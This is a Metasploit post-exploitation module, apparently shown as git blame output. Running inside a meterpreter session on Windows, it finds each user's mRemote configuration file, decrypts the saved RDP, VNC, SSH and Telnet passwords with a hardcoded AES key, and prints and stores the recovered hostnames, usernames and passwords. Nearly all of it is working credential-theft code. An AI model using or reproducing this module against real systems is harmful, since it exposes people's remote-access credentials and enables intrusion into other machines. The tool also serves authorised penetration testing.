2011-06-06 22:54:31 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'rexml/document'
|
2011-07-28 22:56:40 +00:00
|
|
|
require 'msf/core/post/windows/user_profiles'
|
2011-06-06 22:54:31 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
2011-07-28 22:56:40 +00:00
|
|
|
include Msf::Post::Windows::UserProfiles
|
2011-06-06 22:54:31 +00:00
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Windows Gather mRemote Saved Password Extraction',
|
2011-10-17 03:49:49 +00:00
|
|
|
'Description' => %q{
|
2011-07-28 22:56:40 +00:00
|
|
|
This module extracts saved passwords from mRemote. mRemote stores
|
|
|
|
connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves
|
|
|
|
the passwords in an encrypted format. The module will extract the connection
|
|
|
|
info and decrypt the saved passwords.
|
|
|
|
},
|
2011-06-06 22:54:31 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
2011-11-06 22:02:26 +00:00
|
|
|
'TheLightCosine <thelightcosine[at]gmail.com>',
|
|
|
|
'hdm', #Helped write the Decryption Routine
|
|
|
|
'Rob Fuller <mubix[at]hak5.org>' #Helped write the Decryption Routine
|
2011-06-06 22:54:31 +00:00
|
|
|
],
|
2011-11-06 22:02:26 +00:00
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Platform' => [ 'windows' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
2011-06-06 22:54:31 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
@secret= "\xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c"
|
2011-07-28 22:56:40 +00:00
|
|
|
|
|
|
|
grab_user_profiles().each do |user|
|
|
|
|
next if user['LocalAppData'] == nil
|
|
|
|
tmpath= user['LocalAppData'] + '\\Felix_Deimel\\mRemote\\confCons.xml'
|
|
|
|
get_xml(tmpath)
|
2011-06-06 22:54:31 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_xml(path)
|
|
|
|
condata=""
|
|
|
|
begin
|
|
|
|
xmlexists = client.fs.file.stat(path)
|
|
|
|
connections = client.fs.file.new(path,'r')
|
|
|
|
until connections.eof
|
|
|
|
condata << connections.read
|
|
|
|
end
|
|
|
|
parse_xml(condata)
|
|
|
|
print_status("Finished processing #{path}")
|
|
|
|
rescue
|
|
|
|
print_status("The file #{path} either could not be read or does not exist")
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def parse_xml(data)
|
|
|
|
|
|
|
|
mxml= REXML::Document.new(data).root
|
|
|
|
mxml.elements.to_a("//Node").each do |node|
|
2011-07-28 22:56:40 +00:00
|
|
|
|
2011-06-06 22:54:31 +00:00
|
|
|
host = node.attributes['Hostname']
|
|
|
|
port = node.attributes['Port']
|
|
|
|
proto = node.attributes['Protocol']
|
|
|
|
user = node.attributes['Username']
|
|
|
|
domain = node.attributes['Domain']
|
|
|
|
epassword= node.attributes['Password']
|
|
|
|
next if epassword == nil or epassword== ""
|
|
|
|
decoded = epassword.unpack("m*")[0]
|
|
|
|
iv= decoded.slice!(0,16)
|
|
|
|
pass=decrypt(decoded, @secret , iv, "AES-128-CBC")
|
2011-10-29 00:33:16 +00:00
|
|
|
print_good("HOST: #{host} PORT: #{port} PROTOCOL: #{proto} Domain: #{domain} USER: #{user} PASS: #{pass}")
|
|
|
|
user= "#{domain}\\#{user}" unless domain.nil? or domain.empty?
|
2011-06-06 22:54:31 +00:00
|
|
|
report_auth_info(
|
2011-11-06 22:02:26 +00:00
|
|
|
:host => host,
|
|
|
|
:port => port,
|
|
|
|
:sname => proto,
|
2011-11-08 03:34:49 +00:00
|
|
|
:source_id => session.db_record.id,
|
|
|
|
:source_type => "exploit",
|
2011-11-06 22:02:26 +00:00
|
|
|
:user => user,
|
|
|
|
:pass => pass)
|
2011-06-06 22:54:31 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def decrypt(encrypted_data, key, iv, cipher_type)
|
|
|
|
aes = OpenSSL::Cipher::Cipher.new(cipher_type)
|
|
|
|
aes.decrypt
|
|
|
|
aes.key = key
|
|
|
|
aes.iv = iv if iv != nil
|
|
|
|
aes.update(encrypted_data) + aes.final
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|